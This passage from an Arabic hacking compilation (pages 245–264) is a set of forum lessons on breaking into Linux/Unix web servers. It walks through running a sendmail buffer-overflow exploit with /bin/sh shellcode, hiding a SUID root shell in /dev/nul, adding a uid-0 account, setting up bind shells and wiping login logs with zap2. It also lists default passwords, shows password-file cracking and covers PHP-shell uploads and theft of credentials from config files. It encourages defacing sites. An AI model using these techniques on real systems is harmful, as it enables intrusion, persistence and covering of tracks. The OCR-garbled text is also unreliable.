نظام التشغيل اللي الده قامت بتخمينه هو لينكس !!!!!! !!!!!! اه يا و لد الكلب =@sunOSمش كان

بس احنا برده لزم نعرف توزيعه اللينكس الوجوده ..لكن نقدر نقول ان المعلومات اللي جمعناها كفايه و

ممكن تمشي طيب ..كده احنا قمن بعمل سكان على الموقع و لكن ممكن احد الدمينز لو عرف ان اننا قمنا بفحص

موقعه ... اعتقد نه حيكون زعلن منن و حنا مش عايزين الدمين يزعل مننا لذلكD على اي حل فان عمل سكان لموقع يعتبر عمل شرعي ل مشاكل فيه =Ssاستخدمنا الختيار -

لمزيد من المعلومات راجع:bash-2.03$ man nmap

رفع ادواتك على شل اكونت ..

(هذه الخطوه اذا كن عندك شيل اكاونت و مش عايز تخترق من جهازك )اتبع التالي :

bash-2.03$ lsprogram.c

sh-2.03$ ftp shell.comConnected to shell.com

220 shell.com FTP server (SunOS 5.6) ready.Name: luser

331 Password required for luser.Password:

230 User luser logged in.ftp> put program.c

200 PORT command successful.150 ASCII data connection for program.c (204.42.253.18,57982.(226 Transfer complete.

ftp> quit221 Goodbye

ftpطبعا هذه الطريقه ن خلل ا

و هي غير محببه لنها تقوم بعمل ملفات اللوج لذلك يفضل لك ان تقوم بنسح سورس كود الكسبلويت ولصقها في ملف في الشيل .

sh-2.03$ vi exploit.cc ثم انسخ الكود ثم افتح تيرمينال تاني و اتصل بالشيل و الصق الكود في ملف و سميه بامتداد.

كده انت رفعت الكسبلويت بتاعتك للشيل اكاونت .وكومبايل للكسبلويت و بعدين اعملها رن على الهوست المستهدف

sh-2.03$ gcc program.c -o programsh-2.03$ ./program

ملحوظه : عيب اوي انك تاخد المرين دول كقاعده مسلم بيها.. كل اكسبلود و له اوامره الخاصه في

الكومبايل و له طريقه في التشغيل .usageتظهر هذا الطريقه في التعليق البرمجي او في ال

- استغلل الثغرات المختلفه :-

هذا اهم جزا في الموضوع .بمجرد ان تعرف ماهو نظام التشغيل عند الموقع المستهدف و ايضا الديمونزالشغاله على السيرفير

فيمكنك ان تذهب الى اي دتا بيز اللي بتقدم اكسبلويت ..و دي موجوده بكثره على النترنت

245

Page 246: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

http://www.linux.com.cn/hack.co.zaمثل ده فيه كل حاجه ممكن تتخيله ..مقسمه الى ديمونات و نظم تشغيل

و لكن ..ماهي الكسبلويت ؟؟الكسبلويت عباره عن سورس كود عاده مكتوب فبلغه السي او البيرل المهم ان

TARGET.EDUالكسبلويت دي تقوم باستغلل منطقه معينه في السيرفير ..في حاله او اي ديمون اخرsendmail 8.11.0 يمكننا ان نستخدم الكسبلويت الخاصه ب

على فكره العيال ديما اسمعهم يقولوا ان السند ميل هو اكبر ديمون معرض للختراق ..مش عارف ايه السندميل اساسا ؟؟

طيب رووح للدرس ده و نت تعرف :http://www.pharaonics.net/less/NEtworks/124.htm

فيه حاجه لزم تعرفها .ان لما تشغل اكسبلويت على سيرفير معين ..ايه الفوائد اللي جتعود عليك (غير طبعااختراق الموقع )

حتحصل على حاجتين اتنين ..اول حاجه شيل عادي ....تاني حاجه و ده المهم بالنسبه لنا مايسمى بالرووت شيل ..

طبعا انت لو اخدت رووت شيل على السيرفير اذن فانت كده تمتلك كفه الصلحيات و ممكن تعمل كل اللي انتعايزه ..ممكن تستعمل الرووت شيل ده كجهاز و سيط زي ما قلت في اول الدرس

www.securityfocus.comدتا بيز صغيره للكسبلويتات هي :

www.insecure.org/sploits.html

..طيب زي ما قلت ان كل اكسبلويت مختلفه عن الخرى و يجب عليك ان تقرا الكود بتاعها او التعليقات اذاكنت ل تفهم في لغه البرمجه ..

من اسهل و اشهر الكسبلويتات هي البفر اوفر فلو ... يقوم هذه الكسبلويت بعمل ( دربكه في الديمون ) مم يؤدي الى تشغيل الكود الذي تريده

shell codeيقوم هذا الكود بتشغيل شيل في السيرفير لذلك فهو يسمى شيل كود طبعا يختلف هذا الكود تبعا لنظام التشغيل .. لذلك يجب علينا ان نعرف نظم التشغيل المستخدم في السيرفير

لو شوفنا كود اكسبلويت معينه ممكن نلقي ده char shellcode= []

\"xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

\"x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

\"x80\xe8\xdc\xff\xff\xff/bin/sh;"

bin/shاها..دهه للينكس و يقوم بتشغيل الشيل اللي في المسار دهه /طبعا لو السيرفير بتاعك شغال على نظام تشغيل اخر اذن يجب عليك ان تغير الشيل كود

ده الى اخر يناسب النظام المستهدف ..طبعا ممكن تلقي شيل كودس لجميع نظم التشغيل في مواقعالسيكيورتي المختلفه.

... زي ما قلت يجب عليك البا انك متستعملش جهازك في الختراق .. و انما تستخدم جهازا وسيطا او شيل

اكاونت ..طريقه لدخول الى الشيل اكاونت كالتاليbash-2.03$ telnet myshellaccount 23

Trying xx.xx.xx.xx...Connected to yourshellaccount.

Escape character is.'[^' Welcome to yourshellaccount login: malicioususer Password: (it doesn't display(

246

Page 247: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Last login: Fry Sep 15 11:45:34 from <yourIPaddress.<sh-2.03

exploit.cطيب لو عندنا اكسبلويت للسند ميل اسمها

و هي تعمل بفر اوفر فلو .. يمكننا اول عمل الكومبايل و تشغيله كتاللي:sh-2.03$ gcc exploit.c -o exploit

sh-2.03$ ./exploit

This is a sendmail 8.9.11 exploitusage: ./exploit target port

sh-2.03$./exploit 25 target.edu

جميل جميل ...$معنها اننا اخدنا شيل هناكتعال نشوف وضعنا ايه على السيرفير :

$whoamiroot

يا عيني ..كده انا بقيت رووت =)طيب فيه العديد من الكسبلويتت مش بتخليك رووت على السيستم..و انما تديك بس شيل هنال

localلذلك يجب عليك ن تقوم برفع اكسبلةيت اخر لوكل للحصول على الرروت في النظام...تذكر ن تحاول ان تتجنب رفع الكسبلويتات بالف تي بي على قدر

المستطاع(احنا عايزينك =))فيه اكسبلويتات اخرى تعطيك صلحيه اظهار ملف الباسورد..اي تي سي =>

-وضع باك دور :-

جميل .. اذن فقد اخذنا رووت على السيستم ..ماذا بعد ؟؟؟فعل انت في امكانك ان تقوم بتغير الموقع اوالصفحه الرئيسيه

كل ما عليك ان تبحث عن الندكس في اي مكان او باستخدام المر فايند .. eduلكن هذا بصراحه و من غير زعل ..ده شغل اللمرز لن عيب اوي انك تفرد عضلتك على موقع .

فاغلب الهاكرز بامكانهم اختراق هذه الدوميناتو لكن انصحك جديا بتغيير الصفحه الرئيسيه في موقع محترم مثل

microsoft.com , ibm.com etc او المواقع السيئه المحتوى كالباحيه او التي تسب الدين ... على اي حل مش موضوعنا دهه

طيب احنا دلوقتي عايزين نحتفظ بالموقع دهه ..تذكر الثلث اجهزه اياهم جهازك-----> جهاز وسيط------> الجهاز المستهدف .

اذن حنعمل ايه دلوقتي؟؟ حتطلع بره السيرفير ده و تعود للشيل بتاعك و عشان ترجع تاني يلزمكexitفي حاجه ..انت لو كتبت

نفس الخطوات و في هذه الفتره قد يحتمل ان يكون الدمين قد قام بتغيير الباسورد او ركب باتش للديمون المصاب او قام

بعمل اب جريد لهمما يؤدي ان تفشل الكسبلويت في عملها ..و الحل ؟؟

بس احنا دلوقتي رووت و ممكن نعمل اللي في نفسنا ...اذن نركب باك دوور يسمح لنا بالعوده بعد ذلك فياي وقت ..

احسن باك دور هوه الهاك اتاك ..صعب ان النورتون يكشفه و ممك...اه =| =|ايه الكلم ده ياد يا ايسر ؟؟؟؟

هاك اتاك =| !!!!!!اسف نسيت ... =)

طبعا الباك دورز في موضوعي ده تختلف تماما عن الكلم الفاضي ده و ل مؤاخذه طبعا الباك دورز دي عايزالها موضوع لواحده ان شاء احطه لكم قريبا .. لكن انا ساذكر لكم الساسيات

فقط ..؟؟؟؟sushi- ازاي تعمل 1

247

Page 248: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

bin/sh يلزمك ان تقوم بنسخ ال /suid shell او sushiلكي تقوم بعمل كالتالي :suidالى مكان خفي و نقوم باعطاءه صلحيات ال

sh-2.03$ cp /bin/sh /dev/nulهههههه

.. و لو حصل و نظر دخله فانه لن يشعر بشيءdevفي اغلب الحيان الدمين ل ينظر داخل الدايركتوري nullغريب لن فيه ملف اساسا اسمه

=D= ل ده احنا عيال جدعان اوي D

sh-2.03$ cd /devsh-2.03$ chown root nul

نعطي الشيل الصلحيات اللي احنا عايزينها :-

sh-2.03$ chmod 4775 nul اللي احنا عايزينها .suid معناها ال 4775

ممكن ميشتغلش في بعض النظمه .. خليك مع المر الول بيعملchmod +s nulخلي بالك ان المر في كله ..

كده خلصنا مهمتنا ..تعالى نطلع بره كده و نشوف

sh-2.03$ exit

تعال نشوف كده اللي حيحصل :D يوم لو رجعنا =80بعد sh-2.03$ whoami

lusersh-2.03$ /dev/nulsh-2.03$ whoami

root

احنا سوبر يوزرز الن بكل سهوله =) sushi يعني مينفعش نحصل على ال suidفيه مشكله .. في كثير من الشيلز تمنع اعطاء صلحيات ال

A و هو اختصار ل sashو في هذه الحاله يلزمنا ان نرفع للسيرفير المخترق شيل خاص تاني اسمه stand-alone shell

ذو اوامر خاصه به ...sushi اذن نقدر نعمل الن ال bin/sh ل /suidو هو يسمح باعطاء صلحيات ال

- كيف نضيف يوزرز مزورين ؟؟2

و ممكن من خلل الملف ده انك تضيف ايetc/passwdطبعا انت رووت و تقدر تعمل تغيير في الملف /حد انت عايزه

:-viباستعمال المحرر sh-2.03$ vi /etc/passwd

viطبعا لزم يكون عندك فكره عن كيفيه استخدام المحرر في الملف ده حتلقي سطر لكل يوزر عادي يكون على الشكل ده

luser:passwd:uid:gid:startdir:shell

uid & gid =0في حاله السوبر يوزرز بيكون ال اذن اضف السطر ده :

dood::0:0:dood:/:/bin/sh و كده اانت ضفت سوبر يوزر للنظام

sh-2.03$ su doodsh-2.03$ whoami

dood

248

Page 249: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

يساوي صفرuid و ال gid كل من ال doodطبعا احنا رووت ..ليه لن الخ

؟bindshell- كيف تضع 3

bindshell عباره عن ديمون شبيه جد بال telnetd.. في الحقيقه التلنت ديمون عباره عن بايند شيل

UDP بل منفذ TCPالبايند شيل هذا يقوم بفتح بورت او منفذ يعني و لكنه ليس منفذ و طبعا بيعطيك شيل عند التصال بهذا البورت ..

الطريف و الشيق في الموضوع انه الدمين لما ييجي يعمل سكان على الجهاز بتاعه للتامين عاده و في اغلبالحيان السكن يكون

UDP و نادرا جدا ان يعمل سكان على منافذ بروتوكول TCPعلى منافذ ال

- عمليه ازاله الثار :- في نظاام اليونيكس ..عندما تقوم بالدخول الى حسابك .. فنكا ترى رساله عند اول الدخول تعلمك باخر مره

قمت بها بالدخول و رقم الي بي الذي دخلت منه ..يعني سيادتك لو دخلت باسم يوزر و بعد كده اليوزر ده دخل حيلقي الرساله دي

Last login: Sun Sep 24 10:32:14 from <yourIPaddress.<

و طبعا سيادتك كده حتتكشف لن اليوزر ده لو كان ناصح حيبعت ايميل للدمين و يقوله و يبلغه باللي حصل

و طبع الدمين في الحال حيبعتله رساله و يقوله :-متخافش يا واد ده واحد دخل على الحساب بتاعك و الي بي بتاعه موجوود .. و ن ان شاء ال

حاتصل بمزود الخدمه في المنطقه و اساله عن رقم التلفون و ان شاء ابلغ البوليس ..و بالهنا و الشفا =)

المعلومات دي موجوده في المناطق دي

/usr/adm/lastlog /var/adm/lastlog /var/log/lastlog

و دي ممكن تلقيها في اي موقع مهتم ..lledيمكنك مسحهم باستخدام بيكون معاه ملف للمساعده اقراه لكي تعرف طريقه الستخدام ...

لرفع الدوات يتخلف عن ذلك معلومات ايضا يمكنك ازالتهاftpفي حاله استخدام lled و هو شبيه بالده السابقه wtedباستخدام

و لقينا معانا الرووت ؟؟whoماذا لو طبقنا المر

sh-2.03$ whoroot tty1 Sep 25 18:18

zap2ممكن في الحاله دي نستخدم

:luser لو اسمك

sh-2.03$ ./zap2 luserZap2!

sh-2.03$ whosh-2.03$

كلمه اخيره :

249

Page 250: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هذا الموضوع هو عباره عن نبذه بسيطه للمبتدئين يمكنهم من البدايه بدايه موفقه باذن ال .. اتمنى ان يحوز على رضاكم.

انتهى،،،

" درس اخر في اختراق المواقع عن طريق لينكس "

<ةةةةة ةة ةةةةة ةةةة ةةةةةة><ةةةةةة: ةةة ةةة >

اختراق لينكس...

و أنا كالعادة لست مسؤول عن أي تصرف غبي أو أحمق يقوم به أي شخص و هذه المعلومات للعرض وزيادة المعرفة الشخصية

في هذا القسم أقوم بشرح الخطوات الساسية للقيام بعملية اختراق و تخريب على الشبكة فإذا كان لديك أيةمعلومات أو شروح تود نشرها في هذا القسم الرجاء القيام بإرسالها لنا

الـــهـــكـــرنحن هنا في حاجة إلى خلفية بسيطة قبل الخول في التعقيدات

250

Page 251: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

إن قول اختراق أو تخريب يعني الحصول على صلحيات على سيرفرات الشبكات ل يسمح لنا بالحصول عليها في الحوال العادية فخوادم الشبكات معدة لستقبال العديد من الناس و لكل فرد منهم حساب على الشبكة

فالنفترض أن لراشد حساب على الفريسرفرز

FreeServers.com مزود خدمات على النترنت

الذي سيقوم بإعطائه :

اسم مستخدم و هو التعريف لمجلد راشد على الشبكة

كلمة مرور و هي مفتاحه للدخول إلى مجلده و قسمه

و هذان هما السبيل للوصول إلى جميع الخدمات المتاحة لراشد

و سوف نركز على الوصول إلى اللب والصل

هناك طريقتان رئيستان للدخول إلى نظام الولى تتمثل في الحصول على خليط من كلمة سر و اسم مستخدم وهي بطيئة و نادرة وأما الطريقة الثانية فهي استغلل مناطق ضعف الخادم و التسلل من خللها

إن التخريب ممنوع و لنه من السهل مطاردتك إن إكتشاف محولتك للختراق عن طريق الي بي أدرس فهورقم تعريفك على الشبكة و الحل هو أن تقوم بإعطاء بينات خاطئة لمزود خدمات شبكتك

يستخدم المخترقون أدوات لسرقة الرقم السري و اسم المستخم من الماكن العامة مثل مقاهي النترنت و هذاأحد البرامج

قم بتغيير البروكسي و هذا هو السهل أو التسجيل ببيانات و همية لموقع يضمن لك التصفح بخصوصية و قم إذا كانت تعمل Caller IDبتعطيل خدمة

نحن الن نأخذ الخطوة الولى لي عملية هكر ...جمع المعلومات

ونافذة متصفح جديد من خلل محطم أي بي أو أي موقع آخرnotepadeلبد أنك جاهز الن قم بتشغيل مثل

Hakkerz.home.ml.org لي صفحة مهمة htmlقم بفحص الموقع و تسجيل أي إيميل موجود و قم بنسخ

قم بإرسال و همي لهم أقصد إيميل غير موجود مثل

Blahblahblah اسم الموقع@

و ينصح بإرساله من موقع بريد مجاني واستخدام جميع امكانياته المهم سيأتيك إيميل بسبب عدم جود البريد الرسالة headerالمرسل إليه و معه بعض المعلومات الموجوده في

أنت الن في حاجة إلى أدوات تعقب لمعرفة بعض المعلومات عن المزود للخادم الضحية

لتحصل عن معلومات عنه Whois و ثانيا خدمة التعريف IPأول ستحتاج إلى الي بي

الذي سيعطيك معلومات عن مالكي الموقع و نوع السيرفر عليه و قم بتسجيلها

251

Page 252: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

جرب أول fingerالن عليك باستخدام خاصية

@ Fingerاسم الموقع

و إذا لم يقم بإعطائك معلومات التي قد تكون مفيدة جرب ايميل من التي حصلنا عليها في العلى

الذي حصلنا عليه لكي تعرف المنافذ المفتوحةIP للي بي scan portsالن عليك القيام بفحص المنافذ Linux /Unix systemsو الخدمات التي يدعمها الموقع و هناك برامج جيدة لذلك و معظمها لنظمة

خاص بأنظمة ويندوز على الشبكات Exploit Generatorو هذا البرنامج

و إن كنت ستخترق موقع شديد الحراسة فدعنا ننسى تفحص المنافذ لمدة لن هذا العمل غير شرعي و قد يتم مفتوحا فيعني ذلك21 ما يهمنا من ذلك أنه إذا كان المنفذ linuxالكشف عنه إل إذا ما كنت تمتلك نظام

TelNet فذلك أنهم يملكون 23 و إن كان FTPأنهم يدعمون

Telnet الهدف من ذلك هو معرفة نوع السيرفر و أنت في وضع Anonymousفي متصفحك و على العموم للقيام بكل تلك المور سالفة الذكر ستجد ما تحتاجه في الموقع التالي حتى ل تتعب في البحث

hakkerz.home.ml.org المهم فلنتابع حديثنا قم بفتح نافذة telnet و إذا كان23 و غير المنفذ إلى telnet.Victim.com فجرب ذلك بدونها فإن لم يقم بإعطائك بينات فجرب إضافة wwwالموقع يبدأ ب

و إذا لم ينجح جرب أي من مواقع السرفرات التي حصلنا عليها منwww كما ترى مكان telnetكلمة whois و بمجرد نجاحك في الدخول قم بتسجيل أية بيانات تحتاجها و بالتحديد نوع السيرفر

فإن حصل ذلك جرب كتابة ftp و الن سيأخذك إلى منفذ ال 21الن قم بتغيير المنفذ إلى

SYST الذي يعد منفذ ال 80 لتعرف نوع السيرفر الن إذا كنت محظوظا جرب المنفذ httpوسجل أي Whatsبينات و أهمها على الطلق نوع السيرفر فإذا لم تنجح بعد ذلك كله جرب برنامج يدعى

Running و قد يعمل و لكن سيرفر الضحية سيسجل ذلك ?

و كما ذكرت في البداية هناك طريقتان استخدام البرامج أو ايجاد الباسوورد و لنجرب الن الباسوورد الذيستحصل عليه باستخدام

$Login: root$Password: root

تأتي محملة بعدد من الباسوورد الجاهزة و هي غالبا تبقى كماlinuxفلنقم بتجربة هذا أول حيث أن برامج و الذي هو من الموقع سالف الذكر و ل تستخدم البرنامجtelnetهي لذلك عليك القيام باتصال باستخدام

العادي الموجود على جهازك وقم بتجربة الباسوورد و اسماء المستخدمين التالية

ACCOUNT: PASSWORD)login) root: (password) root

sys: sys / system / binbin: sys / bin

mountfsys: mountfsysadm: adm

uucp: uucpnuucp: anon

anon: anonuser: user

games: gamesinstall: install

252

Page 253: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

demo: demoumountfsys: umountfsys

sync: syncadmin: admin

guest: guestdaemon: daemon

و إذا لم تصلح فإن هناك العديد من الناس الغبياء الذين يستخدمون أسماء الدخول كباسوورد قم بتجربة الشق الول من البريد اللكتروني كإسم مستخدم و كذلك كباسوورد أو من البيانات التي حصلت عليها من

whois و أن كنت تعيس الحظ إلى الن قم بالتجربة التالية على افتراض أنك تحاول الدخول إلى نظام unix لذلك عليناpasswdفإنك لربما تتساءل كيف يتعرف النظام إلى الباسوورد و الجواب أن هناك ملف يدعى

و الذي سندخل إليه باستخدام نافذةftpالمحاولة للوصول إليه و إحدى الطرق القديمة هي استخدام ال ينفع في هذه الحالة و لكن عليك أن تكون غير معرف لهم وinternet explorerالمتصفح و في نظري

. سنعيدhakkerz.home.ml.org الموجود في موقع IP jammerكما فتحنا النافذة سابقا باستخدام الكرة ثانية بل إن عملنا السابق و القادم يعتمد على اخفاء الي بي و قم بالتجربة عن طريق الشكل التالي

مثل

ftp:// abc.net أو ftp://ftp.abc.net/ و إن لم يعمل أي منها قم بتجربة أي مواقع ftpكانت و النetc فالنفترض أنك نجحت في الدخول اضغط على مجلد \whoisموجودة في البيانات المعطاة من

قم بتنزيله على جهازك وقم بفتحه و إن كان على الشكل التالي فأنت محظوظ passwdستر ملف

root:2fkbNba29uWys:0:1:Operator:/:/bin/cshadmin:rYsKMjnvRppro:100:11:WWW

administrator:/home/Common/WWW:/bin/cshkangaroo:3A62i9qr:1012:10:Hisaharu

]etc [.

أو سيكون3a62i9qr و تشفير الباسوورد وليس هي هو kangarooو هنا ترى اسم المستخدم و هو المنظر فوق أشبه بالتالي

root:*:0:1:Operator:/:/bin/cshadmin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh

kangaroo:*:1012:10:Hisaharu

TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

و هنا كما تشاهد فإن الباسوورد المشفرة استعيض عنها بباسوورد يصعب فك تشفيرها و هو

’*s أو x’sو إن حصلت على النوع في العلى فإن هناك برامج مخصصة لملفات الباسوورد ليونكس و ? و الذي يحتاج إلى ملفات كلمات كثيرة.John the Ripper 1.5فك تشريرها مثل

انتهى،،،

253

Page 254: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

(الجزء الول) "PHP Shell" درس عن الـ

>pharaonics<منقول من موقع <Arab VieruZ<الكاتب:

موضوع للبي اتش بي شل يشرح الطرق والخداع المستخدمة و اوامر لينكسالسلم عليكم...

البي اتش بي شيل ملف يرعب كل صاحب موقع على سيرفر وحله اسهل مما يمكن

الموضوع بسيط جدا لكن سأطوله قليل فسمحولي :)

اول :

راجع الوصلة التالية

ثانيا :

254

Page 255: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

PHP Shellالن وبعد قراءتك الموضوع كامل اتوقع منك معرفة ما هو الـ

*-----------------------------------------------*

الجزء الول :

اوامر لينكس

*-----------------------------------------------*

ls -aامر سرد الملفات :

سرد جميع الملفات المخفية او غيرها

*-----------------------------------------------*

cat او cat -eامر عرض محتويات الملف :

فتح الملف وعرض محتوياته

*-----------------------------------------------*

rm -fامر حذف الملف :

لحذف الملف الذي تريد

*-----------------------------------------------*

rm -dامر حذف المجلد :

لحذف المجلد الذي تريد

*-----------------------------------------------*

cp -iامر النسخ :

لنسخ الملف الذي تريد

*-----------------------------------------------*

mvامر اعادة التسمية :

لعادة التسمية

*-----------------------------------------------*

ملحظة : لمعرف المزيد من اوامر لينكس قم بشراء الكتب وللحصول على

helpمعلومات اكثر لمر من الوامر كم بوضع المر ثم --

255

Page 256: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ls --helpمثال :

*-----------------------------------------------*

*-----------------------------------------------**-----------------------------------------------*

الجزء الثاني :

كيفية تنفيذ الوامر :

*-----------------------------------------------*

256

Page 257: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

- ستجد مربع للكتابة قم بكتابة المر المراد تنفيذه1

- هنا تعرض الملفات والمجلدات2

- هنا تعرض المجلدات فقط3

- مكان الفلودر الذي تعمل عليه الن 4

- ضع العلمة ليخبرك ما يحدث عند وجود خطأ 5*-----------------------------------------------**-----------------------------------------------*

الجزء الثالث :

الخدع والطرق لتحميل هذا الملف :

*-----------------------------------------------*

هنا تأتي المشكله !!!

لكن ليست مستحيله وسنستعرض بعض الطرق التي اتبعها انا شخصيا

- ايجاد ثغرة تستطيع منها تحميل الملف1

hacked.txtمثال : ثغرة النوك القديمة حقت الـ

*-----------------------------------------------*

- لنفرض اننا نريد اختراق موقع معين وكان صاحب الموقع ذكي جدا وحريص2

هذي طريقه قد تنفع اول تحديد الشركة المستضيفة و نحاول البحث عن مواقع

في نفس السيرفر او على القل في نفس شركة الستضافة يكون صاحبها دلخ

ونحاول نلقى ثغرة نحمل منها الملف

*-----------------------------------------------*

- المواقع المجانية التي تدعم البي اتش بي.3

انتهى،،،

257

Page 258: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

(الجزء الثاني) "PHP Shell" درس عن الـ

>pharaonicsموقع<ةةةةة ةة <Arab VieruZ<ةةةةةة:

نتابع الموضوع مباشره

*-----------------------------------------------**-----------------------------------------------*

الجزء الرابع :

طرق الحصول على الباسورد:

*-----------------------------------------------*

PHP Shell 2هذا الجزء سيأخذ موضوع الـ

طرق الحصول على الباسورد هي من اصعب الطرق التي قد تواجه المخترق .

*-----------------------------------------------*

config.php التي تسمى بالعادة My SQL- اخذ الباس من ملفات اكسس الـ 1

PHP Shellويمكن اخذ الباس عن طريق تنفيذ المر التالي في الـ

الذهاب الى المجلد الذي يوجد فيه هذا الملف وكتابة المر التالي

cat config.php

وسيظهر الباسورد في احد المتغيرات

258

Page 259: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

*-----------------------------------------------*

htpasswed- اخذ الباس المشفر من ملف الـ .2

ويمكن اجاد هذا الملف في احد مجلدات السيرفر واذا لم تجده قم بفتح

حتى تجد مكان الملف السابقhtaccessالـ .

/home/site/.htpasswds/forum/admin/passwdمثال :

cat /home/site/.htpasswds/forum/admin/passwdالمر :

يعني تقدر تفكه بجون ذا رايبرDESستجد الباس المشفر بتشفير

user:nymw4oS3oerdY*-----------------------------------------------*

:service.pwd- طريقة الكستينشون سيرفر او 3

DESوهو تابع للفرونت بيج ويوجد به الباسورد الخاص بالفرونت بيج مشفر

ويوجد داخل مجلد :

_vti_pvt

cat /home/site/www/_vti_pvt/service.pwdالمر :

الخاص بهذا القسمDeXXaرابط : راجع درس

user:nymw4oS3oerdY

*-----------------------------------------------*

- ل يمكن اعتبارها كقسم لكن كملحظة ال وهي :4

phpMyAdminان بعض المواقع تتحد في سكربتات مثل الـ

ويكون لكن موقع اكسس خاص لدخول هذا السكربت

يكون الروت للقاعدة config.phpويكون بملف الـ

يعني يمكن تعدل وتمسح اي قاعدة لي موقع كان !!

انتهى،،،

259

Page 260: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

(الجزء الثالث) "PHP Shellدرس عن الـ"

>pharaonicsموقع<ةةةةة ةة <Arab VieruZ<ةةةةةة:

الجزء الخامس و الخير من هذا الدرس

بما انك الن عرفت معظم الشياء لكن لبد من وجود مشاكل سأذكر الذي اصابني

*-----------------------------------*

- مشكلة عرض المواقع الخرى :1

جميع المواقع الموجودة في السيرفر في :

/home

المر : قم بالذهاب الى مجلد الروت /

ls -a /home

ستجد مجلدات كل مجلد يحوي ملفات موقع ما لعرضه

ls -a /home/SITE

SITEاسم الموقع او المجلد =

*-----------------------------------*

- مشكلة عرض ملفات الموقع :2

الموقع ال اذا كنت انت روت او صاحب الموقعhomeبعض السيرفرات ل تسمح بدخول

الحل :

260

Page 261: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

قم بدخول :

home/site/public_html/

او

home/site/www/

لدخول الى ملفات الموقع التي تعرض

*-----------------------------------*

- بعض الوامر ل تعمل 3

هذه مشكله من الصعب حلها ويجب استعمال باك دور خاص بكرنل السيرفر

اقصد اصدار الكرنل.

انتهى،،،

261

Page 262: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"anmapشرح أداة "

<ةةةةة><ةةةةة ةةةةةة: ةةةةة ةةةةةة>

السم : nmap أداة كشف عن الشبكات و ماسح أمني -

الخلصة : أنواع المسح - الخيارات

الوصف :

صمم هذا البرنامج لكي يسمح لمدراء النظام و الفراد بمسح شبكات كبيرة لتقرير و معرفة المضيفين وماذا يقدمون من خدمات . وتدعم النماب

عدد كبير من تقنيات المسح مثل :

UDPTCP connect()

TCP SYN (half open(ftp proxy (bounceattack(

Reverse-identICMP (ping sweep(

FINACK sweepXmas TreeSYN sweep

and Null scan .

النماب تقدم أيضا عدد من المميزات المتقدمة .. مثل:

remote OS detection via TCP/IP fingerprintingstealth scanning

dynamic delay and retransmission calculationsparallel scanning

262

Page 263: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

detection of down hosts via parallel pingsdecoy scanning port

filtering detectiondirect (non-portmapper) RPC scanning

fragmentation scanningflexible target and port specification

نتائج النماب عادةا ماتكون على هيئة قائمة بالبورتات المهمه التي توجد في اللة التي أجريت عليها عملية المسح . والنماب دائما يعطينا البورتات وإسم الخدمة والعدد والحالة

والبروتوكول

الحاله إما أن تكون مفتوحة او مرشحة أو غير مرشحة

مفتوحة تعني أن اللة سوف تقبل أي إتصال بهذا البورت

المرشحة تعني أن هناك فايروول أو فلتر (مرشح) أو أي عقبة أخرى تغطي هذا البورت وتمنع النماب من معرفة حالة البورت إذا كان مفتوحا أو ل

غير مرشح تعني بأن هذا البورت معروف لدى النماب بأنه مغلق ول يبدو أن أي فايروول أو فلتر (مرشح) تدخل في محاولة النماب

والبورتات غير المرشحة هي أغلب الحالت ول يمكن معرفتهم إل في حالة واحدة ، هي أن يكون معظمالبورتات

التي أجريت لهم عملة المسح في حالة ترشيح

وبالعتماد على الخيارات المستخدمه في النماب فيمكن أن يبلغ عن الحالت المميزة التالية في الريموتهوست :

النظام المستخدم

TCP sequencability

أسماء المستخدمين الذين يشغلون البرامج المرتبطة بكل بورت

أسماء الدي إن إس وبعض الشياء الخرى.

انتهى،،،

263

Page 264: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

طريقة لقتحام السيرفرات بدون ثغرات ""

<منقول من منتديات شبكة الحزم السلمية>>network access<الكاتب:

استخدام الثغرات انا بصراحه ماشوف فيه اي فن ول علم بصراحه انت تستخدم شي جاهز وهذي وجه نظرييعني ماتحس انك تسوي شي متعب ياخذ منك جهد ووقت

لكن في طرق كثيره جدا غير استخدام الثغرات ويمكن كل واحد له طريقته واسلوبه حتى في استغلل الثغرات لكن بما انك انسان يفترض انك هاكر وتشوف نفسك متمكن اعتقد مسئله اقتحام سيرفر او موقع ماراح

تربطها بوقت وزمان يعني ممكن الواحد يجلس يحاول لمده شهر شهرين ثلثه وكل مره يفشل الين يقدر يوصل في الخير لنتيجه وعلى الساس هذا انا كتبت الموضوع هذا الي انشال اتمنى انه يكون مفيد وينفعنا

ال فيه ماراح نتكلم عن المشاركه( احس اني ازعجتكم بمواضيع المشاركه )

% 50% على اغلب السيرفرات الموجوده بالعالم لحظ 50فيه طرق معروفه تمكنك من الدخول ولو بنسبه

اول الجهمات الولى دائمايكون الغرض منها تكوين معلومات عامه عن السيرفر الذي يراد مهاجمتته ومنهنا نبدا الهجوم وعلى اي اساس يتركز الهجوم

احيانا يكون هجوم حرمان خدمه واحيانا هجوم اقتحام كامل حسب الموجود والمتوفر والمعلومات الموجودهلدينا

